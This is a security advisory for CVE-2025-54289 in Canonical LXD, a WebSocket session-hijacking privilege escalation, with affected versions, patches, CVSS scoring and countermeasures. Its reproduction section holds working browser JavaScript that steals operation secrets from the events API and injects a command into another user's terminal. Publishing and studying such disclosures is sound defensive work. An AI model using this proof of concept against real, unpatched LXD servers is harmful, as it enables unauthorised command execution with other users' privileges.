Canonical LXD Vulnerable to Privilege Escalation via WebSocket Connection Hijacking in Operations API

CVE-2025-54289 → View on GitHub ↗ View on CVE.org ↗ View on NVD ↗

Description

Impact

LXD's operations API includes secret values necessary for WebSocket connections when retrieving information about running operations. These secret values are used for authentication of WebSocket connections for terminal and console sessions.

Therefore, attackers with only read permissions can use secret values obtained from the operations API to hijack terminal or console sessions opened by other users. Through this hijacking, attackers can execute arbitrary commands inside instances with the victim's privileges.

Reproduction Steps

  1. Log in to LXD-UI using an account with read-only permissions
  2. Open browser DevTools and execute the following JavaScript code

Note that this JavaScript code uses the /1.0/events API to capture execution events for terminal startup, establishes a websocket connection with that secret, and sends touch /tmp/xxx to the data channel.

(async () => {
class LXDEventsSession {
constructor(callback) {
this.wsBase =
`wss://${window.location.host}/1.0/events?type=operation&all-p
rojects=true`;
this.eventsConn = new WebSocket(this.wsBase);
this.eventsConn.onopen = (event) => {
console.log('Events conn Opened');
};
this.eventsConn.onmessage = (event) => {
callback(event);
};
}}
class LXDWebSocketSession {
constructor(operationId, secrets) {
this.operationId = operationId;
this.secrets = secrets;
this.wsBase =
`wss://${window.location.host}/1.0/operations/${operationId}/w
ebsocket`;
this.connections = {};
this.connections.data = new
WebSocket(`${this.wsBase}?secret=${this.secrets['0']}`);
this.connections.data.onopen = (event) => {
console.log('Data Opened');
this.connections.data.send(new
TextEncoder().encode('touch /tmp/xxx\r'));
}
this.connections.data.onmessage = (event) => {
console.log('[Data]', event.data);
};
this.connections.control = new
WebSocket(`${this.wsBase}?secret=${this.secrets.control}`);
this.connections.control.onopen = (event) => {
console.log('Control Opened');
}
this.connections.control.onmessage = (event) => {
console.log('[Control]', event.data);
};
}
close() {
Object.values(this.connections).forEach(ws => {
if (ws.readyState === WebSocket.OPEN) {
ws.close();
}
});
}
}
const sessions = [];
new LXDEventsSession( (event) => {
const op = JSON.parse(event.data);
const opId = op.metadata.id;const secrets = op.metadata.metadata.fds;
for(const session of sessions){
if(session.operationId === opId){
return;
}
}
sessions.push(new LXDWebSocketSession(opId, secrets))
});
})();
  1. Have another user (or yourself for testing) start a terminal or console session on an instance
    At this time, whoever uses the secret first gains session rights, so it's recommended to intentionally slow down communication speed using DevTools' bandwidth throttling feature for verification.
  2. Refresh the attacker's browser tab to stop event listening
  3. Have the victim reopen their terminal/console session and verify:
$ ls -la /tmp/xxx

Risk

Attack conditions require that the attacker has read permissions for the project, the victim (a user with higher privileges) opens a terminal or console session, and the attacker hijacks the WebSocket connection at the appropriate timing. Therefore, while successful attacks result in privilege escalation, the attack timing is very critical, making the realistic risk of attack relatively low.

Countermeasures

As a fundamental countermeasure, it is recommended to exclude WebSocket connection secret information from operations API responses for read-only users. In the current implementation, the operations API returns all operation information (including secret values) regardless of permission level, which violates the principle of least privilege.

Specifically, in lxd/operations.go, user permissions should be checked, and for users with read-only permissions, WebSocket-related secrets (fds field) should be excluded from operation metadata. This prevents attackers from obtaining secret values, making WebSocket connection hijacking impossible.

Patches

LXD Series Status
6 Fixed in LXD 6.5
5.21 Fixed in LXD 5.21.4
5.0 Ignored - Not critical
4.0 Ignored - EOL and not critical

References

Reported by GMO Flatt Security Inc.

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2025-10-02 21:19:29 UTC
Updated
2025-11-05 22:04:22 UTC
GitHub reviewed
2025-10-02 21:19:29 UTC
NVD published
2025-10-02

EPSS Score

Score Percentile
0.04% 11.90%

CVSS Scores

Base score Version Severity Vector
6.8 3.1
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:H)
Even with access, the exploit needs extra luck, timing, or a fussy environment to actually work.
Privileges required (PR:L)
A normal user session is enough; they don’t have to be admin.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:N)
Service keeps running; no real outage angle.
7.4 4.0
CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:H)
Exploitation depends on constrained or hard-to-reproduce conditions.
Attack requirements (AT:P)
Additional preconditions must be present for exploitation.
Privileges required (PR:L)
Low privileges are required.
User interaction (UI:P)
A user has to participate (for example click/open/approve).
Vulnerable system confidentiality impact (VC:H)
High confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:H)
High integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:N)
No availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:N)
No confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.

Identifiers

Type Value
GHSA GHSA-3g72-chj4-2228 ↗
CVE CVE-2025-54289 ↗

CWEs

CWE id Name
CWE-1385 Missing Origin Validation in WebSockets

Affected packages (3)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
go github.com/canonical/lxd >= 4.0, < 5.21.4 5.21.4
go github.com/canonical/lxd >= 6.0, < 6.5 6.5
go github.com/canonical/lxd >= 0.0.0-20200331193331-03aab09f5b5c, < 0.0.0-20250827065555-0494f5d47e41 0.0.0-20250827065555-0494f5d47e41

References

cvelogic Threat Intelligence